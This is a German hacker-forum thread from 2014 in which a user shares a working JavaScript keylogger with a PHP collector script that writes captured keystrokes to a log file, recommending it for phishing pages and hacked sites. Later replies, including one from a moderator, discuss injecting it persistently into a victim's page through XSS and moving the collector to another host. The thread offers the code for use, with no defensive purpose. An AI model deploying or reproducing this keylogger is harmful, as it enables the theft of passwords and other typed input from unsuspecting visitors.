Jump to content

Willkommen Gast

Navigation

Links

Als Gast hast du nur eingeschränkten Zugriff!


Sign In 

Create Account

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Photo

simpler JS-Keylogger

- - - - -
Started by B1nary ,

  • Please log in to reply
3 replies to this topic

#1
B1nary
Posted 14 May 2014 - 17:24 Uhr

B1nary

    Samurai

  • Elite Member
    • Likes
    489
  • 506 posts
  • 346 Bedankt
Hi zusammen,

hab was ganz Brauchbares gefunden: einen Javascript-Keylogger

index.php
<script type="text/javascript">
document.onkeypress = function(log) {
log = log || window.event;
	 if (String.fromCharCode(log.charCode)) {
		 var http = new XMLHttpRequest();
		 var input = encodeURI(String.fromCharCode(log.charCode));
		 http.open("POST", "keylogger.php", true);
		 http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
		 http.send("inp=" + input); } }
</script>

keylogger.php
<?php
$keylog = $_POST['inp'];
if (!empty($keylog)):
    $fopen = @fopen('log.txt', 'a+');
    @fwrite($fopen, $keylog);
    @fclose($fopen);
endif;
?>

Die log.txt wird automatisch erstellt.
Brauchbar für: Phishing-Sites, shelled Sites

hf

#2
0x90
Posted 14 May 2014 - 19:54 Uhr

0x90

    Noob

  • Members
  • PipPip
    • Likes
    6
  • 9 posts
  • 1 Bedankt
  • verifiziert
Loggt aber nur auf der aktuellen Domain. Wenn sich der Cursor in einem iFrame befindet, was auf ne andere Domain pointed, wird nichts geloggt.
  • Cube and Iron like this

#3
CyberFlash
Posted 15 May 2014 - 04:41 Uhr

CyberFlash

    Moderator

  • Moderator
    • Likes
    118
  • 133 posts
  • 43 Bedankt
Das ganze könnte auch mit XSS gemischt werden .. ?
Heut Abend ma testen ;)
Danke schon ma ^^.png' class='bbc_emoticon' alt='^^' />

#4
B1nary
Posted 15 May 2014 - 17:03 Uhr

B1nary

    Samurai

  • Elite Member
    • Likes
    489
  • 506 posts
  • 346 Bedankt

Das ganze könnte auch mit XSS gemischt werden .. ?
Heut Abend ma testen ;)
Danke schon ma ^^.png' class='bbc_emoticon' alt='^^' />


joa, wenn du die keylogger.php auslagerst und das Javascript persistent via XSS auf der Vic-Page speichern könntest....das wär natürlich geil :P
Back to Javascript & Ajax

  Topic Forum Started By Stats Last Post Info

user(s) are reading this topic

members, guests, anonymous users


This topic has been visited by 93 user(s)


    _wh, .:dodo:., .Puma, 007, 0x90, adn1337, AFK_D4m4ge, Alpha63, Amphe1337, B0ss, B1nary, Banger109, Benutzer, blue_eyed_devil, C64, Ch!ller, codec4, corkscrew, Cube, cyberblade, CyberFlash, Dean36, DeineSicherheit, dervonheute, Dude1308, Elke, Erikson, exsize, FalkE, fl4shx, Framerater, H2Olli, hackEmcee, Heinokel0903, Iron, jack4flash, Julez, juPP, Kaban, kiwitone, lion., lNobodyl, lolorollo, M4cbook, man, marcf2009, massa, matrix567, MCP2000, Melson, Mofug, MS1337, muLTiii, NewHacker, nibble nibble, niklas, nong_dan, opheus, PaulaAbdul, paulaner, peppi200, prto, Psykoon303, pszalewicz, QwErTyYyY, Ragevalley, Rasputin, ReBBeL, Red Hat, retr0, scrack, Siggisuper, sissler, slivanX, smc2014, Stech3r, sub0, Syorack, Techret, thunfisch, Tinoindahouse, TOKAREV, Toolbase, VerZus, WarRaZzer, White-Warti, xaeiou, Xenio, xsasuke16x, xtrx, xxas, Zerobyte, ZeroCool_AT
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.
  1. Toolbase.bz
  2.   Coding
  3.   Web Coding
  4. Javascript & Ajax